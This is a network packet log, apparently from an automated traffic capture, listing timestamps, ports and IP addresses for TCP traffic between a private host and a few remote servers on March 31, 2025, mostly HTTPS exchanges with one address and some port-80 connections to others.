Mar 31, 2025 10:52:55.784423113 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.784662962 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:55.902733088 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:55.902837038 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.352300882 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.356278896 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.460437059 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.461909056 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.484555006 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.484703064 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.564129114 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.564301014 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.591233969 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.591320038 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.666728020 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.666879892 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.695111036 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.695199966 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.770242929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.770328045 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.786447048 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.786547899 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.875158072 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.875247955 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.888612032 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.888705969 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:56.980484009 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:56.980679989 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.086467028 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.086544037 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.158124924 CEST	42836	443	192.168.2.23	91.189.91.43
Mar 31, 2025 10:52:57.189203024 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.189285040 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.292340994 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.292479038 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.312078953 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.312180042 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.420175076 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.420277119 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.522308111 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.522396088 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.543225050 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.543446064 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:57.623611927 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.643680096 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:57.643780947 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.028932095 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.029875994 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.455818892 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.456003904 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.557328939 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.560595989 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.582278967 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.582405090 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.667571068 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.667707920 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.682647943 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.685909986 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.693906069 CEST	42516	80	192.168.2.23	109.202.202.202
Mar 31, 2025 10:52:58.770595074 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.770728111 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.793431044 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.793541908 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.875641108 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.875731945 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.886460066 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.886514902 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.918535948 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.918586969 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.978265047 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.978334904 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:58.992882013 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:58.992944002 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.023638010 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.023674011 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.023722887 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.023722887 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.083620071 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.083712101 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.127171040 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.127326012 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.187285900 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.187347889 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.229757071 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.229861021 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.290760040 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.293872118 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.329081059 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.385782957 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.396987915 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.501764059 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.504910946 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.504971027 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.604065895 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.604156971 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.619657040 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.619791031 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.656414986 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.656507015 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.721865892 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.756372929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.756433964 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.863915920 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.883483887 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.883585930 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:52:59.985023975 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.985052109 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:52:59.985168934 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.010790110 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.010812044 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.011042118 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.092060089 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.115042925 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.115063906 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.115144968 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.161747932 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.221702099 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.221721888 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.221786976 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.221786976 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.269155979 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.269260883 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.324553967 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.324718952 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.427891970 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.428064108 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.530548096 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.530705929 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.561954021 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:00.654701948 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.678189993 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.678304911 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.774173021 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.817198038 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.817878962 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:00.935646057 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.935667038 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:00.935776949 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.035913944 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.036030054 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.036138058 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.036184072 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.138081074 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.138421059 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.151187897 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.151272058 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.243232012 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.257966995 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.258037090 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.377665043 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.377729893 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.482657909 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.482733011 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.573642015 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:01.587352037 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.587480068 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.687674999 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.689903021 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.796684980 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.796823978 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.818644047 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.818770885 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.898570061 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.898827076 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:01.922420979 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:01.922537088 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.000495911 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.000633955 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.015958071 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.016093969 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.046402931 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.046463966 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.102344036 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.102540970 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.121570110 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.121633053 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.149880886 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.150022030 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.252502918 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.252530098 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.252568007 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.252763987 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.357841015 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.357954025 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.461796999 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.461869001 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:02.878264904 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:02.878443003 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.004332066 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.004448891 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.129703045 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.129785061 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.234252930 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.234422922 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.336853027 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.336988926 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.369647980 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.369817019 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.438708067 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.438836098 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.473156929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.473287106 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.544127941 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.544476986 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.556355000 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.556538105 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.587452888 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.587567091 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.589267015 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:03.648497105 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.648601055 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.691426039 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.691507101 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.794790030 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.794941902 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:03.896311998 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:03.896461010 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.000159025 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.000382900 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.019021034 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.061216116 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.166379929 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.173882008 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.181061983 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.181849957 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.275083065 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.275260925 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.291657925 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.353225946 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.457478046 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.457850933 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.560225010 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.560430050 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.665904045 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.686835051 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.687253952 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.795864105 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.812302113 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.812482119 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.915030956 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.915057898 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.915296078 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:04.936404943 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.936424017 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:04.936506987 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.018435955 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.018457890 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.018651009 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.040682077 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.040699005 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.040771961 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.119667053 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.119684935 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.119822025 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.225747108 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.225764990 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.225991964 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.225992918 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.324575901 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.324690104 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.347459078 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.347539902 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.428373098 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.450375080 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.450453997 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.554497004 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.570909023 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.570981026 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.598218918 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.649013996 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.670643091 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.689471960 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.689544916 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.754585028 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.799957037 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.800085068 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.904037952 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.904057980 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:05.904215097 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:05.904231071 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.008663893 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.008867979 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.023195028 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.092941046 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.117837906 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.196145058 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.196295977 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.215452909 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.312864065 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.414815903 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.414834976 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.414915085 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.414915085 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.518492937 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.518686056 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.531718016 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.531773090 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.626169920 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.639148951 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.639206886 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.741298914 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.760440111 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.760497093 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.793823004 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.864803076 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.865447998 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.880352974 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.880506992 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:06.966995955 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.986488104 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:06.986587048 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.022743940 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.090111971 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.090128899 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.090198040 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.144715071 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.194757938 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.194775105 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.194875002 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.201253891 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.301398039 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.301758051 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.317482948 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:07.317609072 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:07.652648926 CEST	58304	80	192.168.2.23	152.36.128.18
Mar 31, 2025 10:53:08.554738998 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:08.554738998 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:08.772648096 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:08.874039888 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:08.929775000 CEST	443	55238	199.232.90.49	192.168.2.23
Mar 31, 2025 10:53:08.929933071 CEST	55238	443	192.168.2.23	199.232.90.49
Mar 31, 2025 10:53:09.727487087 CEST	80	58304	152.36.128.18	192.168.2.23
Mar 31, 2025 10:53:09.727695942 CEST	58304	80	192.168.2.23	152.36.128.18
